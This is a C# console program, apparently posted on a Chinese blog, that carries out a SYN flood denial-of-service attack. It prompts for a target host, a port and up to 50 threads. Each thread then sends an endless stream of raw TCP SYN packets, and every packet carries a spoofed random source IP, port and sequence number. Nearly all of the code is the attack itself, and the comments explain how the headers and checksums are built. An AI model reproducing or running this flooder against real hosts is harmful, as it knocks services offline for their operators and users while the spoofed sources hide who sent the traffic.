1 //在工程属性中设置"允许不安全代码"为true
2 ?using System;
3 using System.Net;
4 using System.Net.Sockets;
5 using System.Threading;
6 //需要的命名空间不用解释了吧
7 namespace syn
8 {
9 public struct ipHeader
10 {
11 public byte ip_verlen; //4位首部长度+4位IP版本号
12 public byte ip_tos; //8位服务类型TOS
13 public ushort ip_totallength; //16位数据包总长度(字节)
14 public ushort ip_id; //16位标识
15 public ushort ip_offset; //3位标志位
16 public byte ip_ttl; //8位生存时间 TTL
17 public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.)
18 public ushort ip_checksum; //16位IP首部校验和
19 public uint ip_srcaddr; //32位源IP地址
20 public uint ip_destaddr; //32位目的IP地址
21 }
22 public struct psdHeader
23 {
24 public uint saddr; //源地址
25 public uint daddr; //目的地址
26 public byte mbz;
27 public byte ptcl; //协议类型
28 public ushort tcpl; //TCP长度
29 }
30 public struct tcpHeader
31 {
32 public ushort th_sport; //16位源端口
33 public ushort th_dport; //16位目的端口
34 public int th_seq; //32位序列号
35 public uint th_ack; //32位确认号
36 public byte th_lenres; //4位首部长度/6位保留字
37 public byte th_flag; //6位标志位
38 public ushort th_win; //16位窗口大小
39 public ushort th_sum; //16位校验和
40 public ushort th_urp; //16位紧急数据偏移量
41 }
42 //这3个是ip首部tcp伪首部tcp首部的定义。
43 public class syn
44 {
45 private uint ip;
46 private ushort port;
47 private EndPoint ep;
48 private Random rand;
49 private Socket sock;
50 private ipHeader iph;
51 private psdHeader psh;
52 private tcpHeader tch;
53 public UInt16 checksum(UInt16[] buffer, int size)
54 {
55 Int32 cksum = 0;
56 int counter;
57 counter = 0;
58 ?
59 while (size > 0)
60 {
61 UInt16 val = buffer[counter];
62 ?
63 cksum += Convert.ToInt32(buffer[counter]);
64 counter += 1;
65 size -= 1;
66 }
67 ?
68 cksum = (cksum >> 16) + (cksum & 0xffff);
69 cksum += (cksum >> 16);
70 return (UInt16)(~cksum);
71 }
72 //这个使用来计算校验码的我照抄c#实现ping那文章的方法,反正ip协议计算校验码方法都一样
73 public syn(uint _ip, ushort _port, EndPoint _ep, Random _rand)
74 {
75 ip = _ip;
76 port = _port;
77 ep = _ep;
78 rand = _rand;
79 ipHeader iph = new ipHeader();
80 psh = new psdHeader();
81 tch = new tcpHeader();
82 sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
83 sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
84 //这2个挺重要,必须这样才可以自己提供ip头
85 }
86 //传参数的多线程需要用到代构造函数的对象。
87 static void Main(string[] args)
88 {
89 Console.WriteLine("1、输入攻击ip或域名");
90 try
91 {
92 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
93 uint ip = Convert.ToUInt32(pe.AddressList[0].Address);//这是要攻击的ip并转为网络字节序
94 Console.WriteLine("2、输入攻击端口");
95 ushort port = ushort.Parse(Console.ReadLine());
96 IPEndPoint ep = new IPEndPoint(pe.AddressList[0], port);
97 byte[] bt = BitConverter.GetBytes(port);
98 Array.Reverse(bt);
99 port = BitConverter.ToUInt16(bt, 0);
100 //要攻击的端口也得转为网络字节序,必须是16位0-65535,如果用hosttonetworkorder就转成32位的了,无奈这样
101 Console.WriteLine("3、输入攻击线程,最多50个");
102 int xiancheng = Int32.Parse(Console.ReadLine());
103 if (xiancheng < 1 || xiancheng > 50)
104 {
105 Console.WriteLine("必须在1到50之间");
106 return;
107 }
108 Random rand = new Random();
109 Thread[] t = new Thread[xiancheng];
110 syn[] sy = new syn[xiancheng];
111 for (int i = 0; i < xiancheng; i++)
112 {
113 sy[i] = new syn(ip, port, ep, rand);
114 t[i] = new Thread(new ThreadStart(sy[i].synFS));
115 t[i].Start();
116 }
117 //一个线程对应一个对象,不知多个线程对应同一个对象行不行,请指点。基础不行啊
118 }
119 catch
120 {
121 Console.WriteLine("有错误,请检查是不是连在网上,或者输入是否都正确");
122 return;
123 }
124 ?
125 ?
126 }
127 unsafe public void synFS()
128 {
129 iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
130 //ipv4,20字节ip头,这个固定就是69
131 iph.ip_tos = 0;
132 //这个0就行了
133 iph.ip_totallength = 0x2800;
134 //这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
135 iph.ip_id = 0x9B18;
136 //这个我是拦截ie发送。直接添上来了
137 iph.ip_offset = 0x40;
138 //这个也是拦截ie的
139 iph.ip_ttl = 64;
140 //也是拦截ie的,也可以是128什么的。
141 iph.ip_protocol = 6;
142 //6就是tcp协议
143 iph.ip_checksum = UInt16.Parse("0");
144 //没计算之前都写0
145 iph.ip_destaddr = ip;
146 //ip头的目标地址就是要攻击的地址,上面传过来的。
147 psh.daddr = iph.ip_destaddr;
148 //伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
149 psh.mbz = 0;
150 //这个据说0就行
151 psh.ptcl = 6;
152 //6是tcp协议
153 psh.tcpl = 0x1400;
154 //tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
155 tch.th_dport = port;
156 //攻击端口号,上面传过来的
157 tch.th_ack = 0;
158 //第一次发送所以没有服务器返回的序列号,为0
159 tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
160 //tcp长度
161 tch.th_flag = 2;
162 //2就是syn
163 tch.th_win = ushort.Parse("16614");
164 //拦截ie的
165 tch.th_sum = UInt16.Parse("0");
166 //没计算之前都为0
167 tch.th_urp = UInt16.Parse("0");
168 //这个连ip都是0,新的攻击方法有改这个值的
169 while (true)
170 {
171 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255)).Address);
172 psh.saddr = iph.ip_srcaddr;
173 ushort duankou = Convert.ToUInt16(rand.Next(1, 65535));
174 byte[] bt = BitConverter.GetBytes(duankou);
175 Array.Reverse(bt);
176 tch.th_sport = BitConverter.ToUInt16(bt, 0);
177 tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
178 //上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
179 ?
180 iph.ip_checksum = 0;
181 tch.th_sum = 0;
182 //因为循环中,所以每次必须把这2个已有数的清0才可计算
183 byte[] psh_buf = new byte[sizeof(psdHeader)];
184 Int32 index = 0;
185 index = pshto(psh, psh_buf, sizeof(psdHeader));
186 if (index == -1)
187 {
188 Console.WriteLine("构造tcp伪首部错误");
189 return;
190 }
191 index = 0;
192 byte[] tch_buf = new byte[sizeof(tcpHeader)];
193 index = tchto(tch, tch_buf, sizeof(tcpHeader));
194 if (index == -1)
195 {
196 Console.WriteLine("构造tcp首部错误1");
197 return;
198 }
199 index = 0;
200 byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
201 Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
202 index += psh_buf.Length;
203 Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
204 index += tch_buf.Length;
205 tch.th_sum = chec(tcphe, index);
206 index = 0;
207 index = tchto(tch, tch_buf, sizeof(tcpHeader));
208 if (index == -1)
209 {
210 Console.WriteLine("构造tcp首部错误2");
211 return;
212 }
213 index = 0;
214 byte[] ip_buf = new byte[sizeof(ipHeader)];
215 index = ipto(iph, ip_buf, sizeof(ipHeader));
216 if (index == -1)
217 {
218 Console.WriteLine("构造ip首部错误1");
219 return;
220 }
221 index = 0;
222 byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
223 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
224 index += ip_buf.Length;
225 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
226 index += tch_buf.Length;
227 iph.ip_checksum = chec(iptcp, index);
228 index = 0;
229 index = ipto(iph, ip_buf, sizeof(tcpHeader));
230 if (index == -1)
231 {
232 Console.WriteLine("构造ip首部错误2");
233 return;
234 }
235 index = 0;
236 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
237 index += ip_buf.Length;
238 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
239 index += tch_buf.Length;
240 if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
241 {
242 Console.WriteLine("构造iptcp报文错误");
243 return;
244 }
245 //上面这一大堆东西就是计算校验和的方法了,方法是
246 //1、建立一个字节数组,前面放tcp伪首部后面放tcp首部,然后计算,确定最终tcp部分的校验和
247 //2、把确定了校验和地tcp首部重新生成字节数组,这是就不加tcp伪首部了,所以工20字节
248 //3、建40字节字节数组,前面放ip首部,后面放tcp首部,校验,确定最终ip部分校验和
249 //4、最后把确定了ip校验和的ip部分和tcp部分先后放入40字节的字节数组中,就是要发送的buffer[]了,就是这么麻烦
250 try
251 {
252 ?
253 sock.SendTo(iptcp, ep);
254 //构造发送字节数组总是麻烦,发送就简单了,socket.sendto就可以了
255 ?
256 }
257 catch
258 {
259 Console.WriteLine("发送错误");
260 return;
261 }
262 ?
263 ?
264 }
265 ?
266 }
267 public UInt16 chec(byte[] buffer, int size)
268 {
269 Double double_length = Convert.ToDouble(size);
270 Double dtemp = Math.Ceiling(double_length / 2);
271 int cksum_buffer_length = Convert.ToInt32(dtemp);
272 UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
273 int icmp_header_buffer_index = 0;
274 for (int i = 0; i < cksum_buffer_length; i++)
275 {
276 cksum_buffer[i] =
277 BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
278 icmp_header_buffer_index += 2;
279 }
280 UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
281 return u_cksum;
282 }
283 //这个是计算校验,把那些类型不一样的全转为16位字节数组用的
284 public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
285 {
286 Int32 rtn = 0;
287 int index = 0;
288 byte[] b_verlen = new byte[1];
289 b_verlen[0] = iph.ip_verlen;
290 byte[] b_tos = new byte[1];
291 b_tos[0] = iph.ip_tos;
292 byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
293 byte[] b_id = BitConverter.GetBytes(iph.ip_id);
294 byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
295 byte[] b_ttl = new byte[1];
296 b_ttl[0] = iph.ip_ttl;
297 byte[] b_protol = new byte[1];
298 b_protol[0] = iph.ip_protocol;
299 byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
300 byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
301 byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
302 Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
303 index += b_verlen.Length;
304 Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
305 index += b_tos.Length;
306 Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
307 index += b_totallen.Length;
308 Array.Copy(b_id, 0, Buffer, index, b_id.Length);
309 index += b_id.Length;
310 Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
311 index += b_offset.Length;
312 Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
313 index += b_ttl.Length;
314 Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
315 index += b_protol.Length;
316 Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
317 index += b_checksum.Length;
318 Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
319 index += b_srcaddr.Length;
320 Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
321 index += b_destaddr.Length;
322 if (index != size/* sizeof(IcmpPacket) */)
323 {
324 rtn = -1;
325 return rtn;
326 }
327 ?
328 rtn = index;
329 return rtn;
330 ?
331 }
332 //这个是把ip部分转为字节数组用的
333 public Int32 pshto(psdHeader psh, byte[] buffer, int size)
334 {
335 Int32 rtn;
336 int index = 0;
337 byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
338 byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
339 byte[] b_psh_mbz = new byte[1];
340 b_psh_mbz[0] = psh.mbz;
341 byte[] b_psh_ptcl = new byte[1];
342 b_psh_ptcl[0] = psh.ptcl;
343 byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
344 Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
345 index += b_psh_saddr.Length;
346 Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
347 index += b_psh_daddr.Length;
348 Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
349 index += b_psh_mbz.Length;
350 Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
351 index += b_psh_ptcl.Length;
352 Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
353 index += b_psh_tcpl.Length;
354 if (index != size)
355 {
356 rtn = -1;
357 return rtn;
358 }
359 else
360 {
361 rtn = index;
362 return rtn;
363 }
364 ?
365 }
366 //这个是把tcp伪首部转为字节数组用的
367 public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
368 {
369 Int32 rtn;
370 int index = 0;
371 byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
372 byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
373 byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
374 byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
375 byte[] b_tch_lenres = new byte[1];
376 b_tch_lenres[0] = tch.th_lenres;
377 byte[] b_tch_flag = new byte[1];
378 b_tch_flag[0] = tch.th_flag;
379 byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
380 byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
381 byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
382 Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
383 index += b_tch_sport.Length;
384 Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
385 index += b_tch_dport.Length;
386 Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
387 index += b_tch_seq.Length;
388 Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
389 index += b_tch_ack.Length;
390 Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
391 index += b_tch_lenres.Length;
392 Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
393 index += b_tch_flag.Length;
394 Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
395 index += b_tch_win.Length;
396 Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
397 index += b_tch_sum.Length;
398 Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
399 index += b_tch_urp.Length;
400 if (index != size)
401 {
402 rtn = -1;
403 return rtn;
404 }
405 else
406 {
407 rtn = index;
408 return rtn;
409 }
410 }
411 //这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
412 }
413 }
浙公网安备 33010602011771号